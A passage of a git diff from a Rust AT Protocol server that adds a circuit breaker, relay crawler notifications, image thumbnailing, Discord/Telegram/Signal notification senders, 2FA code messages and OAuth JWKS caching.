impl<E: std::fmt::Display> std::fmt::Display for CircuitBreakerError<E> {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
match self {
CircuitBreakerError::CircuitOpen(e) => write!(f, "{}", e),
CircuitBreakerError::OperationFailed(e) => write!(f, "Operation failed: {}", e),
}
}
}
impl<E: std::error::Error + 'static> std::error::Error for CircuitBreakerError<E> {
fn source(&self) -> Option<&(dyn std::error::Error + 'static)> {
match self {
CircuitBreakerError::CircuitOpen(e) => Some(e),
CircuitBreakerError::OperationFailed(e) => Some(e),
}
}
}
#[cfg(test)]
mod tests {
use super::*;
#[tokio::test]
async fn test_circuit_breaker_starts_closed() {
let cb = CircuitBreaker::new("test", 3, 2, 10);
assert_eq!(cb.state().await, CircuitState::Closed);
assert!(cb.can_execute().await);
}
#[tokio::test]
async fn test_circuit_breaker_opens_after_failures() {
let cb = CircuitBreaker::new("test", 3, 2, 10);
cb.record_failure().await;
assert_eq!(cb.state().await, CircuitState::Closed);
cb.record_failure().await;
assert_eq!(cb.state().await, CircuitState::Closed);
cb.record_failure().await;
assert_eq!(cb.state().await, CircuitState::Open);
assert!(!cb.can_execute().await);
}
#[tokio::test]
async fn test_circuit_breaker_success_resets_failures() {
let cb = CircuitBreaker::new("test", 3, 2, 10);
cb.record_failure().await;
cb.record_failure().await;
cb.record_success().await;
cb.record_failure().await;
cb.record_failure().await;
assert_eq!(cb.state().await, CircuitState::Closed);
cb.record_failure().await;
assert_eq!(cb.state().await, CircuitState::Open);
}
#[tokio::test]
async fn test_circuit_breaker_half_open_closes_after_successes() {
let cb = CircuitBreaker::new("test", 3, 2, 0);
for _ in 0..3 {
cb.record_failure().await;
}
assert_eq!(cb.state().await, CircuitState::Open);
tokio::time::sleep(Duration::from_millis(100)).await;
assert!(cb.can_execute().await);
assert_eq!(cb.state().await, CircuitState::HalfOpen);
cb.record_success().await;
assert_eq!(cb.state().await, CircuitState::HalfOpen);
cb.record_success().await;
assert_eq!(cb.state().await, CircuitState::Closed);
}
#[tokio::test]
async fn test_circuit_breaker_half_open_reopens_on_failure() {
let cb = CircuitBreaker::new("test", 3, 2, 0);
for _ in 0..3 {
cb.record_failure().await;
}
tokio::time::sleep(Duration::from_millis(100)).await;
cb.can_execute().await;
cb.record_failure().await;
assert_eq!(cb.state().await, CircuitState::Open);
}
#[tokio::test]
async fn test_with_circuit_breaker_helper() {
let cb = CircuitBreaker::new("test", 3, 2, 10);
let result: Result<i32, CircuitBreakerError<std::io::Error>> =
with_circuit_breaker(&cb, || async { Ok(42) }).await;
assert!(result.is_ok());
assert_eq!(result.unwrap(), 42);
let result: Result<i32, CircuitBreakerError<&str>> =
with_circuit_breaker(&cb, || async { Err("error") }).await;
assert!(result.is_err());
}
}

170
src/crawlers.rs Normal file
View File

@@ -0,0 +1,170 @@
use crate::circuit_breaker::CircuitBreaker;
use crate::sync::firehose::SequencedEvent;
use reqwest::Client;
use std::sync::atomic::{AtomicU64, Ordering};
use std::sync::Arc;
use std::time::Duration;
use tokio::sync::{broadcast, watch};
use tracing::{debug, error, info, warn};
const NOTIFY_THRESHOLD_SECS: u64 = 20 * 60;
pub struct Crawlers {
hostname: String,
crawler_urls: Vec<String>,
http_client: Client,
last_notified: AtomicU64,
circuit_breaker: Option<Arc<CircuitBreaker>>,
}
impl Crawlers {
pub fn new(hostname: String, crawler_urls: Vec<String>) -> Self {
Self {
hostname,
crawler_urls,
http_client: Client::builder()
.timeout(Duration::from_secs(30))
.build()
.unwrap_or_default(),
last_notified: AtomicU64::new(0),
circuit_breaker: None,
}
}
pub fn with_circuit_breaker(mut self, circuit_breaker: Arc<CircuitBreaker>) -> Self {
self.circuit_breaker = Some(circuit_breaker);
self
}
pub fn from_env() -> Option<Self> {
let hostname = std::env::var("PDS_HOSTNAME").ok()?;
let crawler_urls: Vec<String> = std::env::var("CRAWLERS")
.unwrap_or_default()
.split(',')
.filter(|s| !s.is_empty())
.map(|s| s.trim().to_string())
.collect();
if crawler_urls.is_empty() {
return None;
}
Some(Self::new(hostname, crawler_urls))
}
fn should_notify(&self) -> bool {
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap_or_default()
.as_secs();
let last = self.last_notified.load(Ordering::Relaxed);
now - last >= NOTIFY_THRESHOLD_SECS
}
fn mark_notified(&self) {
let now = std::time::SystemTime::now()
.duration_since(std::time::UNIX_EPOCH)
.unwrap_or_default()
.as_secs();
self.last_notified.store(now, Ordering::Relaxed);
}
pub async fn notify_of_update(&self) {
if !self.should_notify() {
debug!("Skipping crawler notification due to debounce");
return;
}
if let Some(cb) = &self.circuit_breaker {
if !cb.can_execute().await {
debug!("Skipping crawler notification due to circuit breaker open");
return;
}
}
self.mark_notified();
let circuit_breaker = self.circuit_breaker.clone();
for crawler_url in &self.crawler_urls {
let url = format!("{}/xrpc/com.atproto.sync.requestCrawl", crawler_url.trim_end_matches('/'));
let hostname = self.hostname.clone();
let client = self.http_client.clone();
let cb = circuit_breaker.clone();
tokio::spawn(async move {
match client
.post(&url)
.json(&serde_json::json!({ "hostname": hostname }))
.send()
.await
{
Ok(response) => {
if response.status().is_success() {
debug!(crawler = %url, "Successfully notified crawler");
if let Some(cb) = cb {
cb.record_success().await;
}
} else {
warn!(
crawler = %url,
status = %response.status(),
"Crawler notification returned non-success status"
);
if let Some(cb) = cb {
cb.record_failure().await;
}
}
}
Err(e) => {
warn!(crawler = %url, error = %e, "Failed to notify crawler");
if let Some(cb) = cb {
cb.record_failure().await;
}
}
}
});
}
}
}
pub async fn start_crawlers_service(
crawlers: Arc<Crawlers>,
mut firehose_rx: broadcast::Receiver<SequencedEvent>,
mut shutdown: watch::Receiver<bool>,
) {
info!(
hostname = %crawlers.hostname,
crawler_count = crawlers.crawler_urls.len(),
crawlers = ?crawlers.crawler_urls,
"Starting crawlers notification service"
);
loop {
tokio::select! {
result = firehose_rx.recv() => {
match result {
Ok(event) => {
if event.event_type == "commit" {
crawlers.notify_of_update().await;
}
}
Err(broadcast::error::RecvError::Lagged(n)) => {
warn!(skipped = n, "Crawlers service lagged behind firehose");
crawlers.notify_of_update().await;
}
Err(broadcast::error::RecvError::Closed) => {
error!("Firehose channel closed, stopping crawlers service");
break;
}
}
}
_ = shutdown.changed() => {
if *shutdown.borrow() {
info!("Crawlers service shutting down");
break;
}
}
}
}
}

304
src/image/mod.rs Normal file
View File

@@ -0,0 +1,304 @@
use image::{DynamicImage, ImageFormat, ImageReader, imageops::FilterType};
use std::io::Cursor;
pub const THUMB_SIZE_FEED: u32 = 200;
pub const THUMB_SIZE_FULL: u32 = 1000;
#[derive(Debug, Clone)]
pub struct ProcessedImage {
pub data: Vec<u8>,
pub mime_type: String,
pub width: u32,
pub height: u32,
}
#[derive(Debug, Clone)]
pub struct ImageProcessingResult {
pub original: ProcessedImage,
pub thumbnail_feed: Option<ProcessedImage>,
pub thumbnail_full: Option<ProcessedImage>,
}
#[derive(Debug, thiserror::Error)]
pub enum ImageError {
#[error("Failed to decode image: {0}")]
DecodeError(String),
#[error("Failed to encode image: {0}")]
EncodeError(String),
#[error("Unsupported image format: {0}")]
UnsupportedFormat(String),
#[error("Image too large: {width}x{height} exceeds maximum {max_dimension}")]
TooLarge {
width: u32,
height: u32,
max_dimension: u32,
},
#[error("File too large: {size} bytes exceeds maximum {max_size} bytes")]
FileTooLarge { size: usize, max_size: usize },
}
pub const DEFAULT_MAX_FILE_SIZE: usize = 10 * 1024 * 1024; // 10MB
pub struct ImageProcessor {
max_dimension: u32,
max_file_size: usize,
output_format: OutputFormat,
generate_thumbnails: bool,
}
#[derive(Debug, Clone, Copy)]
pub enum OutputFormat {
WebP,
Jpeg,
Png,
Original,
}
impl Default for ImageProcessor {
fn default() -> Self {
Self {
max_dimension: 4096,
max_file_size: DEFAULT_MAX_FILE_SIZE,
output_format: OutputFormat::WebP,
generate_thumbnails: true,
}
}
}
impl ImageProcessor {
pub fn new() -> Self {
Self::default()
}
pub fn with_max_dimension(mut self, max: u32) -> Self {
self.max_dimension = max;
self
}
pub fn with_max_file_size(mut self, max: usize) -> Self {
self.max_file_size = max;
self
}
pub fn with_output_format(mut self, format: OutputFormat) -> Self {
self.output_format = format;
self
}
pub fn with_thumbnails(mut self, generate: bool) -> Self {
self.generate_thumbnails = generate;
self
}
pub fn process(&self, data: &[u8], mime_type: &str) -> Result<ImageProcessingResult, ImageError> {
if data.len() > self.max_file_size {
return Err(ImageError::FileTooLarge {
size: data.len(),
max_size: self.max_file_size,
});
}
let format = self.detect_format(mime_type, data)?;
let img = self.decode_image(data, format)?;
if img.width() > self.max_dimension || img.height() > self.max_dimension {
return Err(ImageError::TooLarge {
width: img.width(),
height: img.height(),
max_dimension: self.max_dimension,
});
}
let original = self.encode_image(&img)?;
let thumbnail_feed = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FEED || img.height() > THUMB_SIZE_FEED) {
Some(self.generate_thumbnail(&img, THUMB_SIZE_FEED)?)
} else {
None
};
let thumbnail_full = if self.generate_thumbnails && (img.width() > THUMB_SIZE_FULL || img.height() > THUMB_SIZE_FULL) {
Some(self.generate_thumbnail(&img, THUMB_SIZE_FULL)?)
} else {
None
};
Ok(ImageProcessingResult {
original,
thumbnail_feed,
thumbnail_full,
})
}
fn detect_format(&self, mime_type: &str, data: &[u8]) -> Result<ImageFormat, ImageError> {
match mime_type.to_lowercase().as_str() {
"image/jpeg" | "image/jpg" => Ok(ImageFormat::Jpeg),
"image/png" => Ok(ImageFormat::Png),
"image/gif" => Ok(ImageFormat::Gif),
"image/webp" => Ok(ImageFormat::WebP),
_ => {
if let Ok(format) = image::guess_format(data) {
Ok(format)
} else {
Err(ImageError::UnsupportedFormat(mime_type.to_string()))
}
}
}
}
fn decode_image(&self, data: &[u8], format: ImageFormat) -> Result<DynamicImage, ImageError> {
let cursor = Cursor::new(data);
let reader = ImageReader::with_format(cursor, format);
reader
.decode()
.map_err(|e| ImageError::DecodeError(e.to_string()))
}
fn encode_image(&self, img: &DynamicImage) -> Result<ProcessedImage, ImageError> {
let (data, mime_type) = match self.output_format {
OutputFormat::WebP => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::WebP)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/webp".to_string())
}
OutputFormat::Jpeg => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Jpeg)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/jpeg".to_string())
}
OutputFormat::Png => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/png".to_string())
}
OutputFormat::Original => {
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
(buf, "image/png".to_string())
}
};
Ok(ProcessedImage {
data,
mime_type,
width: img.width(),
height: img.height(),
})
}
fn generate_thumbnail(&self, img: &DynamicImage, max_size: u32) -> Result<ProcessedImage, ImageError> {
let (orig_width, orig_height) = (img.width(), img.height());
let (new_width, new_height) = if orig_width > orig_height {
let ratio = max_size as f64 / orig_width as f64;
(max_size, (orig_height as f64 * ratio) as u32)
} else {
let ratio = max_size as f64 / orig_height as f64;
((orig_width as f64 * ratio) as u32, max_size)
};
let thumb = img.resize(new_width, new_height, FilterType::Lanczos3);
self.encode_image(&thumb)
}
pub fn is_supported_mime_type(mime_type: &str) -> bool {
matches!(
mime_type.to_lowercase().as_str(),
"image/jpeg" | "image/jpg" | "image/png" | "image/gif" | "image/webp"
)
}
pub fn strip_exif(data: &[u8]) -> Result<Vec<u8>, ImageError> {
let format = image::guess_format(data)
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
let cursor = Cursor::new(data);
let img = ImageReader::with_format(cursor, format)
.decode()
.map_err(|e| ImageError::DecodeError(e.to_string()))?;
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), format)
.map_err(|e| ImageError::EncodeError(e.to_string()))?;
Ok(buf)
}
}
#[cfg(test)]
mod tests {
use super::*;
fn create_test_image(width: u32, height: u32) -> Vec<u8> {
let img = DynamicImage::new_rgb8(width, height);
let mut buf = Vec::new();
img.write_to(&mut Cursor::new(&mut buf), ImageFormat::Png).unwrap();
buf
}
#[test]
fn test_process_small_image() {
let processor = ImageProcessor::new();
let data = create_test_image(100, 100);
let result = processor.process(&data, "image/png").unwrap();
assert!(result.thumbnail_feed.is_none());
assert!(result.thumbnail_full.is_none());
}
#[test]
fn test_process_large_image_generates_thumbnails() {
let processor = ImageProcessor::new();
let data = create_test_image(2000, 1500);
let result = processor.process(&data, "image/png").unwrap();
assert!(result.thumbnail_feed.is_some());
assert!(result.thumbnail_full.is_some());
let feed_thumb = result.thumbnail_feed.unwrap();
assert!(feed_thumb.width <= THUMB_SIZE_FEED);
assert!(feed_thumb.height <= THUMB_SIZE_FEED);
let full_thumb = result.thumbnail_full.unwrap();
assert!(full_thumb.width <= THUMB_SIZE_FULL);
assert!(full_thumb.height <= THUMB_SIZE_FULL);
}
#[test]
fn test_webp_conversion() {
let processor = ImageProcessor::new().with_output_format(OutputFormat::WebP);
let data = create_test_image(500, 500);
let result = processor.process(&data, "image/png").unwrap();
assert_eq!(result.original.mime_type, "image/webp");
}
#[test]
fn test_reject_too_large() {
let processor = ImageProcessor::new().with_max_dimension(1000);
let data = create_test_image(2000, 2000);
let result = processor.process(&data, "image/png");
assert!(matches!(result, Err(ImageError::TooLarge { .. })));
}
#[test]
fn test_is_supported_mime_type() {
assert!(ImageProcessor::is_supported_mime_type("image/jpeg"));
assert!(ImageProcessor::is_supported_mime_type("image/png"));
assert!(ImageProcessor::is_supported_mime_type("image/gif"));
assert!(ImageProcessor::is_supported_mime_type("image/webp"));
assert!(!ImageProcessor::is_supported_mime_type("image/bmp"));
assert!(!ImageProcessor::is_supported_mime_type("text/plain"));
}
}

View File

@@ -1,14 +1,19 @@
pub mod api;
pub mod auth;
pub mod circuit_breaker;
pub mod config;
pub mod crawlers;
pub mod image;
pub mod notifications;
pub mod oauth;
pub mod plc;
pub mod rate_limit;
pub mod repo;
pub mod state;
pub mod storage;
pub mod sync;
pub mod util;
pub mod validation;
use axum::{
Router,
@@ -20,6 +25,7 @@ pub fn app(state: AppState) -> Router {
Router::new()
.route("/health", get(api::server::health))
.route("/xrpc/_health", get(api::server::health))
.route("/robots.txt", get(api::server::robots_txt))
.route(
"/xrpc/com.atproto.server.describeServer",
get(api::server::describe_server),
@@ -140,6 +146,14 @@ pub fn app(state: AppState) -> Router {
"/xrpc/com.atproto.sync.subscribeRepos",
get(sync::subscribe_repos),
)
.route(
"/xrpc/com.atproto.sync.getHead",
get(sync::get_head),
)
.route(
"/xrpc/com.atproto.sync.getCheckout",
get(sync::get_checkout),
)
.route(
"/xrpc/com.atproto.moderation.createReport",
post(api::moderation::create_report),
@@ -338,9 +352,17 @@ pub fn app(state: AppState) -> Router {
)
.route("/oauth/authorize", get(oauth::endpoints::authorize_get))
.route("/oauth/authorize", post(oauth::endpoints::authorize_post))
.route("/oauth/authorize/select", post(oauth::endpoints::authorize_select))
.route("/oauth/authorize/2fa", get(oauth::endpoints::authorize_2fa_get))
.route("/oauth/authorize/2fa", post(oauth::endpoints::authorize_2fa_post))
.route("/oauth/authorize/deny", post(oauth::endpoints::authorize_deny))
.route("/oauth/token", post(oauth::endpoints::token_endpoint))
.route("/oauth/revoke", post(oauth::endpoints::revoke_token))
.route("/oauth/introspect", post(oauth::endpoints::introspect_token))
.route(
"/xrpc/com.atproto.temp.checkSignupQueue",
get(api::temp::check_signup_queue),
)
.route("/xrpc/{*method}", any(api::proxy::proxy_handler))
.with_state(state)
}

View File

@@ -1,7 +1,9 @@
use bspds::notifications::{EmailSender, NotificationService};
use bspds::crawlers::{Crawlers, start_crawlers_service};
use bspds::notifications::{DiscordSender, EmailSender, NotificationService, SignalSender, TelegramSender};
use bspds::state::AppState;
use std::net::SocketAddr;
use std::process::ExitCode;
use std::sync::Arc;
use tokio::sync::watch;
use tracing::{error, info, warn};
@@ -41,13 +43,6 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
let state = AppState::new(pool.clone()).await;
bspds::sync::listener::start_sequencer_listener(state.clone()).await;
let relays = std::env::var("RELAYS")
.unwrap_or_default()
.split(',')
.filter(|s| !s.is_empty())
.map(|s| s.to_string())
.collect();
bspds::sync::relay_client::start_relay_clients(state.clone(), relays, None).await;
let (shutdown_tx, shutdown_rx) = watch::channel(false);
@@ -60,7 +55,34 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
warn!("Email notifications disabled (MAIL_FROM_ADDRESS not set)");
}
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx));
if let Some(discord_sender) = DiscordSender::from_env() {
info!("Discord notifications enabled");
notification_service = notification_service.register_sender(discord_sender);
}
if let Some(telegram_sender) = TelegramSender::from_env() {
info!("Telegram notifications enabled");
notification_service = notification_service.register_sender(telegram_sender);
}
if let Some(signal_sender) = SignalSender::from_env() {
info!("Signal notifications enabled");
notification_service = notification_service.register_sender(signal_sender);
}
let notification_handle = tokio::spawn(notification_service.run(shutdown_rx.clone()));
let crawlers_handle = if let Some(crawlers) = Crawlers::from_env() {
let crawlers = Arc::new(
crawlers.with_circuit_breaker(state.circuit_breakers.relay_notification.clone())
);
let firehose_rx = state.firehose_tx.subscribe();
info!("Crawlers notification service enabled");
Some(tokio::spawn(start_crawlers_service(crawlers, firehose_rx, shutdown_rx)))
} else {
warn!("Crawlers notification service disabled (PDS_HOSTNAME or CRAWLERS not set)");
None
};
let app = bspds::app(state);
@@ -75,6 +97,9 @@ async fn run() -> Result<(), Box<dyn std::error::Error>> {
.await;
notification_handle.await.ok();
if let Some(handle) = crawlers_handle {
handle.await.ok();
}
if let Err(e) = server_result {
return Err(format!("Server error: {}", e).into());

View File

@@ -2,11 +2,14 @@ mod sender;
mod service;
mod types;
pub use sender::{EmailSender, NotificationSender};
pub use sender::{
DiscordSender, EmailSender, NotificationSender, SendError, SignalSender, TelegramSender,
is_valid_phone_number, sanitize_header_value,
};
pub use service::{
enqueue_account_deletion, enqueue_email_update, enqueue_email_verification,
enqueue_notification, enqueue_password_reset, enqueue_plc_operation, enqueue_welcome,
NotificationService,
channel_display_name, enqueue_2fa_code, enqueue_account_deletion, enqueue_email_update,
enqueue_email_verification, enqueue_notification, enqueue_password_reset,
enqueue_plc_operation, enqueue_welcome, NotificationService,
};
pub use types::{
NewNotification, NotificationChannel, NotificationStatus, NotificationType, QueuedNotification,

View File

@@ -1,10 +1,17 @@
use async_trait::async_trait;
use reqwest::Client;
use serde_json::json;
use std::process::Stdio;
use std::time::Duration;
use tokio::io::AsyncWriteExt;
use tokio::process::Command;
use super::types::{NotificationChannel, QueuedNotification};
const HTTP_TIMEOUT_SECS: u64 = 30;
const MAX_RETRIES: u32 = 3;
const INITIAL_RETRY_DELAY_MS: u64 = 500;
#[async_trait]
pub trait NotificationSender: Send + Sync {
fn channel(&self) -> NotificationChannel;
@@ -24,6 +31,48 @@ pub enum SendError {
#[error("External service error: {0}")]
ExternalService(String),
#[error("Invalid recipient format: {0}")]
InvalidRecipient(String),
#[error("Request timeout")]
Timeout,
#[error("Max retries exceeded: {0}")]
MaxRetriesExceeded(String),
}
fn create_http_client() -> Client {
Client::builder()
.timeout(Duration::from_secs(HTTP_TIMEOUT_SECS))
.connect_timeout(Duration::from_secs(10))
.build()
.unwrap_or_else(|_| Client::new())
}
fn is_retryable_status(status: reqwest::StatusCode) -> bool {
status.is_server_error() || status == reqwest::StatusCode::TOO_MANY_REQUESTS
}
async fn retry_delay(attempt: u32) {
let delay_ms = INITIAL_RETRY_DELAY_MS * 2u64.pow(attempt);
tokio::time::sleep(Duration::from_millis(delay_ms)).await;
}
pub fn sanitize_header_value(value: &str) -> String {
value.replace(['\r', '\n'], " ").trim().to_string()
}
pub fn is_valid_phone_number(number: &str) -> bool {
if number.len() < 2 || number.len() > 20 {
return false;
}
let mut chars = number.chars();
if chars.next() != Some('+') {
return false;
}
let remaining: String = chars.collect();
!remaining.is_empty() && remaining.chars().all(|c| c.is_ascii_digit())
}
pub struct EmailSender {
@@ -47,18 +96,19 @@ impl EmailSender {
Some(Self::new(from_address, from_name))
}
fn format_email(&self, notification: &QueuedNotification) -> String {
let subject = notification.subject.as_deref().unwrap_or("Notification");
pub fn format_email(&self, notification: &QueuedNotification) -> String {
let subject = sanitize_header_value(notification.subject.as_deref().unwrap_or("Notification"));
let recipient = sanitize_header_value(&notification.recipient);
let from_header = if self.from_name.is_empty() {
self.from_address.clone()
} else {
format!("{} <{}>", self.from_name, self.from_address)
format!("{} <{}>", sanitize_header_value(&self.from_name), self.from_address)
};
format!(
"From: {}\r\nTo: {}\r\nSubject: {}\r\nContent-Type: text/plain; charset=utf-8\r\nMIME-Version: 1.0\r\n\r\n{}",
from_header,
notification.recipient,
recipient,
subject,
notification.body
)
@@ -96,3 +146,242 @@ impl NotificationSender for EmailSender {
Ok(())
}
}
pub struct DiscordSender {
webhook_url: String,
http_client: Client,
}
impl DiscordSender {
pub fn new(webhook_url: String) -> Self {
Self {
webhook_url,
http_client: create_http_client(),
}
}
pub fn from_env() -> Option<Self> {
let webhook_url = std::env::var("DISCORD_WEBHOOK_URL").ok()?;
Some(Self::new(webhook_url))
}
}
#[async_trait]
impl NotificationSender for DiscordSender {
fn channel(&self) -> NotificationChannel {
NotificationChannel::Discord
}
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
let subject = notification.subject.as_deref().unwrap_or("Notification");
let content = format!("**{}**\n\n{}", subject, notification.body);
let payload = json!({
"content": content,
"username": "BSPDS"
});
let mut last_error = None;
for attempt in 0..MAX_RETRIES {
let result = self
.http_client
.post(&self.webhook_url)
.json(&payload)
.send()
.await;
match result {
Ok(response) => {
if response.status().is_success() {
return Ok(());
}
let status = response.status();
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
last_error = Some(format!("Discord webhook returned {}", status));
retry_delay(attempt).await;
continue;
}
let body = response.text().await.unwrap_or_default();
return Err(SendError::ExternalService(format!(
"Discord webhook returned {}: {}",
status, body
)));
}
Err(e) => {
if e.is_timeout() {
if attempt < MAX_RETRIES - 1 {
last_error = Some(format!("Discord request timed out"));
retry_delay(attempt).await;
continue;
}
return Err(SendError::Timeout);
}
return Err(SendError::ExternalService(format!(
"Discord request failed: {}",
e
)));
}
}
}
Err(SendError::MaxRetriesExceeded(
last_error.unwrap_or_else(|| "Unknown error".to_string()),
))
}
}
pub struct TelegramSender {
bot_token: String,
http_client: Client,
}
impl TelegramSender {
pub fn new(bot_token: String) -> Self {
Self {
bot_token,
http_client: create_http_client(),
}
}
pub fn from_env() -> Option<Self> {
let bot_token = std::env::var("TELEGRAM_BOT_TOKEN").ok()?;
Some(Self::new(bot_token))
}
}
#[async_trait]
impl NotificationSender for TelegramSender {
fn channel(&self) -> NotificationChannel {
NotificationChannel::Telegram
}
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
let chat_id = &notification.recipient;
let subject = notification.subject.as_deref().unwrap_or("Notification");
let text = format!("*{}*\n\n{}", subject, notification.body);
let url = format!(
"https://api.telegram.org/bot{}/sendMessage",
self.bot_token
);
let payload = json!({
"chat_id": chat_id,
"text": text,
"parse_mode": "Markdown"
});
let mut last_error = None;
for attempt in 0..MAX_RETRIES {
let result = self
.http_client
.post(&url)
.json(&payload)
.send()
.await;
match result {
Ok(response) => {
if response.status().is_success() {
return Ok(());
}
let status = response.status();
if is_retryable_status(status) && attempt < MAX_RETRIES - 1 {
last_error = Some(format!("Telegram API returned {}", status));
retry_delay(attempt).await;
continue;
}
let body = response.text().await.unwrap_or_default();
return Err(SendError::ExternalService(format!(
"Telegram API returned {}: {}",
status, body
)));
}
Err(e) => {
if e.is_timeout() {
if attempt < MAX_RETRIES - 1 {
last_error = Some(format!("Telegram request timed out"));
retry_delay(attempt).await;
continue;
}
return Err(SendError::Timeout);
}
return Err(SendError::ExternalService(format!(
"Telegram request failed: {}",
e
)));
}
}
}
Err(SendError::MaxRetriesExceeded(
last_error.unwrap_or_else(|| "Unknown error".to_string()),
))
}
}
pub struct SignalSender {
signal_cli_path: String,
sender_number: String,
}
impl SignalSender {
pub fn new(signal_cli_path: String, sender_number: String) -> Self {
Self {
signal_cli_path,
sender_number,
}
}
pub fn from_env() -> Option<Self> {
let signal_cli_path = std::env::var("SIGNAL_CLI_PATH")
.unwrap_or_else(|_| "/usr/local/bin/signal-cli".to_string());
let sender_number = std::env::var("SIGNAL_SENDER_NUMBER").ok()?;
Some(Self::new(signal_cli_path, sender_number))
}
}
#[async_trait]
impl NotificationSender for SignalSender {
fn channel(&self) -> NotificationChannel {
NotificationChannel::Signal
}
async fn send(&self, notification: &QueuedNotification) -> Result<(), SendError> {
let recipient = &notification.recipient;
if !is_valid_phone_number(recipient) {
return Err(SendError::InvalidRecipient(format!(
"Invalid phone number format: {}",
recipient
)));
}
let subject = notification.subject.as_deref().unwrap_or("Notification");
let message = format!("{}\n\n{}", subject, notification.body);
let output = Command::new(&self.signal_cli_path)
.arg("-u")
.arg(&self.sender_number)
.arg("send")
.arg("-m")
.arg(&message)
.arg(recipient)
.output()
.await?;
if !output.status.success() {
let stderr = String::from_utf8_lossy(&output.stderr);
return Err(SendError::ExternalService(format!(
"signal-cli failed: {}",
stderr
)));
}
Ok(())
}
}

View File

@@ -443,3 +443,39 @@ pub async fn enqueue_plc_operation(
)
.await
}
pub async fn enqueue_2fa_code(
db: &PgPool,
user_id: Uuid,
code: &str,
hostname: &str,
) -> Result<Uuid, sqlx::Error> {
let prefs = get_user_notification_prefs(db, user_id).await?;
let body = format!(
"Hello @{},\n\nYour sign-in verification code is: {}\n\nThis code will expire in 10 minutes.\n\nIf you did not request this, please secure your account immediately.",
prefs.handle, code
);
enqueue_notification(
db,
NewNotification::new(
user_id,
prefs.channel,
super::types::NotificationType::TwoFactorCode,
prefs.email.clone(),
Some(format!("Sign-in Verification - {}", hostname)),
body,
),
)
.await
}
pub fn channel_display_name(channel: NotificationChannel) -> &'static str {
match channel {
NotificationChannel::Email => "email",
NotificationChannel::Discord => "Discord",
NotificationChannel::Telegram => "Telegram",
NotificationChannel::Signal => "Signal",
}
}

View File

@@ -31,6 +31,7 @@ pub enum NotificationType {
AccountDeletion,
AdminEmail,
PlcOperation,
TwoFactorCode,
}
#[derive(Debug, Clone, FromRow)]

View File

@@ -57,6 +57,7 @@ impl Default for ClientMetadata {
#[derive(Clone)]
pub struct ClientMetadataCache {
cache: Arc<RwLock<HashMap<String, CachedMetadata>>>,
jwks_cache: Arc<RwLock<HashMap<String, CachedJwks>>>,
http_client: Client,
cache_ttl_secs: u64,
}
@@ -66,11 +67,21 @@ struct CachedMetadata {
cached_at: std::time::Instant,
}
struct CachedJwks {
jwks: serde_json::Value,
cached_at: std::time::Instant,
}
impl ClientMetadataCache {
pub fn new(cache_ttl_secs: u64) -> Self {
Self {
cache: Arc::new(RwLock::new(HashMap::new())),
http_client: Client::new(),
jwks_cache: Arc::new(RwLock::new(HashMap::new())),
http_client: Client::builder()
.timeout(std::time::Duration::from_secs(30))
.connect_timeout(std::time::Duration::from_secs(10))
.build()
.unwrap_or_else(|_| Client::new()),
cache_ttl_secs,
}
}
@@ -101,6 +112,84 @@ impl ClientMetadataCache {
Ok(metadata)
}
pub async fn get_jwks(&self, metadata: &ClientMetadata) -> Result<serde_json::Value, OAuthError> {
if let Some(jwks) = &metadata.jwks {
return Ok(jwks.clone());
}
let jwks_uri = metadata.jwks_uri.as_ref().ok_or_else(|| {
OAuthError::InvalidClient(
"Client using private_key_jwt must have jwks or jwks_uri".to_string(),
)
})?;
{
let cache = self.jwks_cache.read().await;
if let Some(cached) = cache.get(jwks_uri) {
if cached.cached_at.elapsed().as_secs() < self.cache_ttl_secs {
return Ok(cached.jwks.clone());
}
}
}
let jwks = self.fetch_jwks(jwks_uri).await?;
{
let mut cache = self.jwks_cache.write().await;
cache.insert(
jwks_uri.clone(),
CachedJwks {
jwks: jwks.clone(),
cached_at: std::time::Instant::now(),
},
);
}
Ok(jwks)
}
async fn fetch_jwks(&self, jwks_uri: &str) -> Result<serde_json::Value, OAuthError> {
if !jwks_uri.starts_with("https://") {
if !jwks_uri.starts_with("http://")
|| (!jwks_uri.contains("localhost") && !jwks_uri.contains("127.0.0.1"))
{
return Err(OAuthError::InvalidClient(
"jwks_uri must use https (except for localhost)".to_string(),
));
}
}
let response = self
.http_client
.get(jwks_uri)
.header("Accept", "application/json")
.send()
.await
.map_err(|e| {
OAuthError::InvalidClient(format!("Failed to fetch JWKS from {}: {}", jwks_uri, e))
})?;
if !response.status().is_success() {
return Err(OAuthError::InvalidClient(format!(
"Failed to fetch JWKS: HTTP {}",
response.status()
)));
}
let jwks: serde_json::Value = response
.json()
.await
.map_err(|e| OAuthError::InvalidClient(format!("Invalid JWKS JSON: {}", e)))?;
if jwks.get("keys").and_then(|k| k.as_array()).is_none() {
return Err(OAuthError::InvalidClient(
"JWKS must contain a 'keys' array".to_string(),
));
}
Ok(jwks)
}
async fn fetch_metadata(&self, client_id: &str) -> Result<ClientMetadata, OAuthError> {
if !client_id.starts_with("http://") && !client_id.starts_with("https://") {
return Err(OAuthError::InvalidClient(
@@ -244,7 +333,8 @@ impl ClientMetadata {
}
}
pub fn verify_client_auth(
pub async fn verify_client_auth(
cache: &ClientMetadataCache,
metadata: &ClientMetadata,
client_auth: &super::ClientAuth,
) -> Result<(), OAuthError> {
@@ -258,7 +348,7 @@ pub fn verify_client_auth(
)),
